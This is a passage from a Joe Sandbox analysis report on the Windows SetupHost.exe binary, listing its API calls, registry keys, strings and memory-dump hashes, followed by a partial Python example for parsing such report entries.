• RegQueryValueExW.KERNEL32(00000000,BuildLabEx,00000000,?,00000000,00000000,?,00000000,?), ref: 004FB5C6
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?), ref: 004FB5E7
• HeapAlloc.KERNEL32(00000000,?,00000000,?), ref: 004FB5EE
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?), ref: 004FB64E
• HeapFree.KERNEL32(00000000,?,00000000,?), ref: 004FB655
• RegCloseKey.KERNEL32(00000000,?,00000000,?), ref: 004FB664
Strings
Similarity
• API ID: Heap$CloseProcess$AllocFreeOpenQueryValue
• String ID: BuildLabEx
• API String ID: 3475947390-1430032658
APIs
• memset.MSVCRT ref: 00548E77
• WinHttpOpen.WINHTTP(OneSettingsQuery,00000000,00000000,00000000,00000000,00000001,00000001,00000000), ref: 00548E9A
• GetLastError.KERNEL32 ref: 00548EA6
• WinHttpConnect.WINHTTP(00000000,00000000,000001BB,00000000), ref: 00548EC3
• WinHttpOpenRequest.WINHTTP(?,GET,?,00000000,00000000,00000000,00800000,?,?,00000001,00000000,00000000,00000000,?,?), ref: 00548F0F
Strings
Similarity
• API ID: Http$Open$ConnectErrorLastRequestmemset
• String ID: GET$OneSettingsQuery
• API String ID: 1858633897-231841399
APIs
• __EH_prolog3_GS.LIBCMT ref: 0054D24C
• GetNativeSystemInfo.KERNEL32(?,0000002C,0054DDC5,00000030,0054DF7C,?,?,00000000,00000000,?,00000050,0053E322,?,?,?), ref: 0054D277
Strings
Similarity
• API ID: H_prolog3_InfoNativeSystem
• String ID: amd64$arm$arm64$ia64$x86
• API String ID: 1414440993-1770253632
APIs
• FreeSid.ADVAPI32(00000000,005421D3,?,00000001,00552740,0000003C), ref: 00542211
• FreeSid.ADVAPI32(00000000,005421D3,?,00000001,00552740), ref: 00542223
• FreeSid.ADVAPI32(00000000,005421D3,?,00000001,00552740), ref: 00542235
• CloseHandle.KERNEL32(@'U,005421D3,?,00000001,00552740), ref: 00542246
• GetProcessHeap.KERNEL32(00000000,00000000,005421D3,?,00000001,00552740), ref: 00542255
• HeapFree.KERNEL32(00000000,?,00000001,00552740), ref: 0054225C
Strings
Similarity
• API ID: Free$Heap$CloseHandleProcess
• String ID: @'U
• API String ID: 2806346229-1310671820
APIs
• WTSGetActiveConsoleSessionId.KERNEL32(?,00000001,00000000,00000001,00000000,00000000,00000001,00000000), ref: 00548F42
• WTSQueryUserToken.WTSAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3), ref: 00548F63
• WTSEnumerateSessionsW.WTSAPI32(00000000,00000000,00000001,?,?), ref: 00548F79
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001,00000000), ref: 00548F83
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3,00000001), ref: 00548FB5
• WTSQueryUserToken.WTSAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00548EE3), ref: 00548FC8
• CloseHandle.KERNEL32(00000000), ref: 00548FFE
• WTSFreeMemory.WTSAPI32(?), ref: 0054900D
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleQueryTokenUser$ActiveConsoleEnumerateErrorFreeLastMemorySessionSessions
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3370614215-0
                                                                                                                        • Opcode ID: 111176b624cad8123a660f3cd5ab0c0cfe4106deaff22d8e57089fc2347a2523
                                                                                                                        • Instruction ID: 0886721ac7a49e75e7e6cc0e36dfbeb74c0e21ce1fc5afce08a1d3e270442350
                                                                                                                        • Opcode Fuzzy Hash: 111176b624cad8123a660f3cd5ab0c0cfe4106deaff22d8e57089fc2347a2523
                                                                                                                        • Instruction Fuzzy Hash: 3A314B71D00229FBCB21CF98D948AEEBFB9FF18719F104066E811A7250DB709E49DB94
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004ECC1A
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004ECDCC
                                                                                                                          • Part of subcall function 004F7D4B: UuidToStringW.RPCRT4(00000000,00000001), ref: 004F7D71
                                                                                                                          • Part of subcall function 004F7D4B: RpcStringFreeW.RPCRT4(00000000), ref: 004F7DD1
                                                                                                                          • Part of subcall function 004F8A19: __EH_prolog3.LIBCMT ref: 004F8A20
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeH_prolog3String$LibraryUuid
                                                                                                                        • String ID: CSetupHost::LoadSetupObject$SetupHost: Loading ID: [%s] from [%s\%s]...$SetupHost: Loading complete.$W
                                                                                                                        • API String ID: 4275956829-1340171671
                                                                                                                        • Opcode ID: c96b0d018180dcfcff0ed19ae8e3fa22b204d118c5452a3539efbacb90b196c4
                                                                                                                        • Instruction ID: a733b0873824342f34c613e236651ea0c15e011343090afd6b07258e415a9850
                                                                                                                        • Opcode Fuzzy Hash: c96b0d018180dcfcff0ed19ae8e3fa22b204d118c5452a3539efbacb90b196c4
                                                                                                                        • Instruction Fuzzy Hash: 6751B574B002199BCF04AF65CCA9E7EB772AF88311F14442FE9059B391CB789C02CB95
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FE595: _vsnwprintf.MSVCRT ref: 004FE5C7
                                                                                                                        • RegGetValueW.KERNEL32(80000002,?,RefreshAfter,00000048,00000000,?,00000008,?,?,?,00000001,00000001,00000000), ref: 00549D41
                                                                                                                        • RegGetValueW.ADVAPI32(80000002,?,RefreshInterval,00000018,00000000,0000000D,00000004,?,?,?,00000001,00000001,00000000), ref: 00549D6B
                                                                                                                          • Part of subcall function 00549E64: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,00000000,?,?,?,?,80000002,00000001,00000000), ref: 00549EE2
                                                                                                                          • Part of subcall function 00549E64: RegCloseKey.ADVAPI32(00000000,?,?,?,?,80000002,00000001,00000000), ref: 0054A1CC
                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,00000001,00000001,00000000), ref: 00549D96
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: TimeValue$CloseFileOpenSystem_vsnwprintf
                                                                                                                        • String ID: %ls\%ls\%ls$RefreshAfter$RefreshInterval
                                                                                                                        • API String ID: 2199227765-3481348938
                                                                                                                        • Opcode ID: bd65773cee730135a4c1bfcd4741a1bc9753d7a857f6e3bfef5e510962068f62
                                                                                                                        • Instruction ID: e50905855e1982a74bf221ba93458aebe9e8bcdee53f763108836e60176480e1
                                                                                                                        • Opcode Fuzzy Hash: bd65773cee730135a4c1bfcd4741a1bc9753d7a857f6e3bfef5e510962068f62
                                                                                                                        • Instruction Fuzzy Hash: 6F5162B1A8021C9BDB24DF64DC99BDABBFDBB58704F0044AAE509D3241E774AE84CF54
                                                                                                                        APIs
                                                                                                                        • memset.MSVCRT ref: 0053E4D9
                                                                                                                        • RtlGetVersion.NTDLL ref: 0053E4EE
                                                                                                                          • Part of subcall function 004F9CA1: GetModuleHandleExW.KERNEL32(00000001,ntdll.dll,?,?,?,?,00000000,?,004E7B5C), ref: 004F9CD7
                                                                                                                          • Part of subcall function 004F9CA1: GetLastError.KERNEL32(?,?,?,00000000,?,004E7B5C), ref: 004F9CE1
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000), ref: 0053E537
                                                                                                                        Strings
                                                                                                                        • base\ntsetup\conx\common\setuplib\src\osinfo.cpp, xrefs: 0053E54E
                                                                                                                        • ConX::Setup::Common::COSInfoHelper::GetHostOSVersion, xrefs: 0053E549
                                                                                                                        • Host OS version: %u.%u.%u.%u %s (%hu.%hu) Platform 0x%X, SuiteMask 0x%hX, ProdType 0x%hX, xrefs: 0053E590
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$HandleModuleVersionmemset
                                                                                                                        • String ID: ConX::Setup::Common::COSInfoHelper::GetHostOSVersion$Host OS version: %u.%u.%u.%u %s (%hu.%hu) Platform 0x%X, SuiteMask 0x%hX, ProdType 0x%hX$base\ntsetup\conx\common\setuplib\src\osinfo.cpp
                                                                                                                        • API String ID: 872402777-2280374826
                                                                                                                        • Opcode ID: bc0fa837dc3916ac502eb12dd7ba7462c49309d2ec5fcc68defaf31b1304e311
                                                                                                                        • Instruction ID: f33ef0a7543915cd05183c7010d9e1bd4509e944c9f7f8739bf087db93fcae77
                                                                                                                        • Opcode Fuzzy Hash: bc0fa837dc3916ac502eb12dd7ba7462c49309d2ec5fcc68defaf31b1304e311
                                                                                                                        • Instruction Fuzzy Hash: B9313EB1508355ABC7209F65D815AAFBBE8FF88705F00091EF99896280E774DD14CBA2
                                                                                                                        APIs
                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,00000001,?), ref: 0054A36D
                                                                                                                          • Part of subcall function 004FE595: _vsnwprintf.MSVCRT ref: 004FE5C7
                                                                                                                        • RegOpenKeyExW.KERNEL32(80000002,?,00000000,000F003F,?), ref: 0054A3EF
                                                                                                                        • RegSetValueExW.KERNEL32(?,RefreshAfter,00000000,0000000B,?,00000008), ref: 0054A41F
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0054A43B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Time$CloseFileOpenSystemValue_vsnwprintf
                                                                                                                        • String ID: %ls\%ls\%ls$RefreshAfter
                                                                                                                        • API String ID: 3920268704-4261152845
                                                                                                                        • Opcode ID: 2259bd20d47af6da088c14ba9585cd4350ce97d0d059550977c694712a2d6e41
                                                                                                                        • Instruction ID: 0f871ae90b9a8568fcd237a79894f71fa917cfb9cb6b809b2d78782fd5c4e861
                                                                                                                        • Opcode Fuzzy Hash: 2259bd20d47af6da088c14ba9585cd4350ce97d0d059550977c694712a2d6e41
                                                                                                                        • Instruction Fuzzy Hash: 69318B72D8122DABCB20DF54DC89ADAFBB8FB58311F0001EAA909E3250D6709E448FD1
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,00000000), ref: 004FD18D
                                                                                                                        • IsWow64Process.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 004FD194
                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,00000000,?,00000000), ref: 004FD19E
                                                                                                                        • RegCreateKeyExW.KERNEL32(80000002,SYSTEM\Setup\MoSetup,00000000,00000000,00000000,00020019,00000000,00000000,?,?,?,00000000), ref: 004FD1D5
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,00000000), ref: 004FD210
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseCreateCurrentErrorLastWow64
                                                                                                                        • String ID: SYSTEM\Setup\MoSetup
                                                                                                                        • API String ID: 2503966421-2337335475
                                                                                                                        • Opcode ID: 1658f679fb4b2bf5a61a2b5996924eb09696057b6ff5ee741a0670e63302fd09
                                                                                                                        • Instruction ID: a99595bb3b8aa4885333f51bad4882f124f591800d16b2a7ea034e825b550c1f
                                                                                                                        • Opcode Fuzzy Hash: 1658f679fb4b2bf5a61a2b5996924eb09696057b6ff5ee741a0670e63302fd09
                                                                                                                        • Instruction Fuzzy Hash: FE217C31E0021DEBDF14DFA5D908AAFBBB9AF48355F10006AAA05E3250D7389E04DBA5
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,SYSTEM\Setup\MoSetup\Volatile,?,?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 004FD25E
                                                                                                                        • IsWow64Process.KERNEL32(00000000,?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 004FD265
                                                                                                                        • GetLastError.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 004FD26F
                                                                                                                        • RegCreateKeyExW.KERNEL32(80000002,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,00000000,00020019,00000000,?,?,?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000), ref: 004FD2A6
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000), ref: 004FD2E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseCreateCurrentErrorLastWow64
                                                                                                                        • String ID: SYSTEM\Setup\MoSetup\Volatile
                                                                                                                        • API String ID: 2503966421-1711884389
                                                                                                                        • Opcode ID: ae70278196de93a2e25adb8be035002150b6fcca8ad3e73c10aab010fdb541d1
                                                                                                                        • Instruction ID: 60cc42dfdc16ac965ff399ecc501c8cc55ad6855da2db8c2c87beb18231814b2
                                                                                                                        • Opcode Fuzzy Hash: ae70278196de93a2e25adb8be035002150b6fcca8ad3e73c10aab010fdb541d1
                                                                                                                        • Instruction Fuzzy Hash: 8E217F35E0021DEBDF149FA5D809AAFBBB9AF48355F1100AAAA05E3250D7389E04DBD5
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • CMoSetupOneSettingsHelperT<class CEmptyType>::SetServerEndpoint, xrefs: 004FAF76, 004FAFA1
                                                                                                                        • SYSTEM\Setup\MoSetup, xrefs: 004FAFB4
                                                                                                                        • settings-win-ppe.data.microsoft.com, xrefs: 004FAFE0
                                                                                                                        • TestMode, xrefs: 004FAFBA
                                                                                                                        • settings-win.data.microsoft.com, xrefs: 004FAF87
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3
                                                                                                                        • String ID: CMoSetupOneSettingsHelperT<class CEmptyType>::SetServerEndpoint$SYSTEM\Setup\MoSetup$TestMode$settings-win-ppe.data.microsoft.com$settings-win.data.microsoft.com
                                                                                                                        • API String ID: 431132790-2510570186
                                                                                                                        • Opcode ID: 4af013b143e1357ec3831b528bbf8682025681e37a9a54a8b2111ffa0ce2984f
                                                                                                                        • Instruction ID: d9f4292dc4f4cb2abb14a36f35fec1aa7f5387c70f6b26712ced18113bc69e68
                                                                                                                        • Opcode Fuzzy Hash: 4af013b143e1357ec3831b528bbf8682025681e37a9a54a8b2111ffa0ce2984f
                                                                                                                        • Instruction Fuzzy Hash: 6A1160B9B0021A97CB15DB548851B7E7272ABC4704F10441FEA15AF381DF7C9D5187AA
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 004FD0D0
                                                                                                                        • IsWow64Process.KERNEL32(00000000,?,00000000), ref: 004FD0D7
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 004FD0E1
                                                                                                                        • RegOpenKeyExW.KERNEL32(80000002,SYSTEM\Setup\MoSetup\Volatile,00000000,?,?,?,00000000), ref: 004FD10E
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 004FD13F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseCurrentErrorLastOpenWow64
                                                                                                                        • String ID: SYSTEM\Setup\MoSetup\Volatile
                                                                                                                        • API String ID: 3444879603-1711884389
                                                                                                                        • Opcode ID: 77bbd2248471a16d17aca5d5a8dddcafd9bf71bef971c39d6c2abd4bec10c3b0
                                                                                                                        • Instruction ID: b83943b0f83f91facdd3f9181cd8fd7854efabc2d44e928f926a90edc7173f4b
                                                                                                                        • Opcode Fuzzy Hash: 77bbd2248471a16d17aca5d5a8dddcafd9bf71bef971c39d6c2abd4bec10c3b0
                                                                                                                        • Instruction Fuzzy Hash: 5B115E31E0020CEFCF14AFA5E9989AEBBB9EF48355B10406AE505D3250DB788E05EB64
                                                                                                                        APIs
                                                                                                                        • GetFileVersionInfoSizeExW.KERNELBASE(00000003,?,00000000,?,00000000,?,00000000), ref: 004FF4B0
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,00000000), ref: 004FF4C1
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 004FF4C8
                                                                                                                        • GetFileVersionInfoExW.KERNELBASE(00000003,?,00000000,?,00000000,?,00000000), ref: 004FF4E0
                                                                                                                        • SetLastError.KERNEL32(00000008,?,00000000), ref: 004FF4F9
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 004FF506
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 004FF50D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FileInfoProcessVersion$AllocErrorFreeLastSize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 91032023-0
                                                                                                                        • Opcode ID: 0e3345d6c223214d63c2216166431e3569b358e96428234c2cd9bed8d6d0e229
                                                                                                                        • Instruction ID: a26779af8531dc1851ad539d9a547d848f845efd358acb053e8c5832a060e8d5
                                                                                                                        • Opcode Fuzzy Hash: 0e3345d6c223214d63c2216166431e3569b358e96428234c2cd9bed8d6d0e229
                                                                                                                        • Instruction Fuzzy Hash: 4E019636A04319BBDB111FA9AC5CB7F7F6CEF58712F044065BA09D22D0DA748A089BA0
                                                                                                                        APIs
                                                                                                                        • SetLastError.KERNEL32(00000057,00000000,004FF550,?,00000000), ref: 004FE3B4
                                                                                                                          • Part of subcall function 004FE5FC: GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004FE360,?,00000000,00000000,004FF550), ref: 004FE660
                                                                                                                          • Part of subcall function 004FE5FC: GetLastError.KERNEL32(?,?,?,004FE360,?,00000000,00000000,004FF550), ref: 004FE676
                                                                                                                          • Part of subcall function 004FE5FC: _wcsnicmp.MSVCRT ref: 004FE6C3
                                                                                                                          • Part of subcall function 004FE5FC: _wcsnicmp.MSVCRT ref: 004FE6DB
                                                                                                                        • GetFileAttributesW.KERNEL32(00000000,?,00000000,00000000,004FF550,?,00000000), ref: 004FE367
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 004FE383
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 004FE38E
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 004FE395
                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,004FF550,?,00000000), ref: 004FE39D
                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000), ref: 004FE3A6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Heap_wcsnicmp$AttributesFileFreeProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 686246089-0
                                                                                                                        • Opcode ID: 9589da0c591775712c5c3696b0be8b92a6ca9f3cf95e7b6ddfc8852295fc5f08
                                                                                                                        • Instruction ID: 2f71d5f44d2d50eb0e79ce77be2d99e6de9b0a4acd504c446fe312536f7d736a
                                                                                                                        • Opcode Fuzzy Hash: 9589da0c591775712c5c3696b0be8b92a6ca9f3cf95e7b6ddfc8852295fc5f08
                                                                                                                        • Instruction Fuzzy Hash: 52F02D3B5087289BD31017BA7C1C57B2A25EBD8733B1A0666FE12C32B0D7244C0AB595
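The API, Strings and Memory Dump Source lines in these function entries have a fixed shape (`Api.MODULE(args), ref: ADDR`, `text, xrefs: ADDR, ADDR`, nested `Part of subcall function ADDR:` lines, and a `Source File ... Offset: BASE` line), which makes them easy to mine when triaging a long report like this one, for instance to list every registry key a SetupHost function opens or to turn the `ref:` addresses into image-relative offsets. The parser below is an added example written for this page, not Joe Sandbox code or part of the report; the sample input is constructed to mirror the entries above, the HKEY handle table uses the standard predefined-handle values, and `rva` assumes the `Offset` field is the module base at dump time, as the report's `based on PE: true` annotation indicates.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample input, shaped like the Joe Sandbox function entries on this page.
SAMPLE = r"""
APIs
• GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000), ref: 004FD0D0
• IsWow64Process.KERNEL32(00000000,?,00000000), ref: 004FD0D7
• RegOpenKeyExW.KERNEL32(80000002,SYSTEM\Setup\MoSetup\Volatile,00000000,?,?,?,00000000), ref: 004FD10E
  • Part of subcall function 004FE5FC: _wcsnicmp.MSVCRT ref: 004FE6C3
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 004FD13F
Strings
• CMoSetupOneSettingsHelperT<class CEmptyType>::SetServerEndpoint, xrefs: 004FAF76, 004FAFA1
• TestMode, xrefs: 004FAFBA
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
"""

# Predefined registry root handles as they appear in the first argument of RegOpenKeyExW.
HKEY_NAMES = {
    "80000000": "HKEY_CLASSES_ROOT",
    "80000001": "HKEY_CURRENT_USER",
    "80000002": "HKEY_LOCAL_MACHINE",
    "80000003": "HKEY_USERS",
}

API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
STRING_RE = re.compile(
    r"^•\s*(?P<text>.+?),\s*xrefs:\s*(?P<xrefs>[0-9A-Fa-f]{8}(?:,\s*[0-9A-Fa-f]{8})*)\s*$"
)
SOURCE_RE = re.compile(r"^•\s*Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<base>[0-9A-Fa-f]{8})")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                      # absolute address of the call site
    subcall_of: Optional[int] = None  # set when the line came from "Part of subcall function"


@dataclass
class StringRef:
    text: str
    xrefs: List[int]


@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[StringRef] = field(default_factory=list)
    source_file: Optional[str] = None
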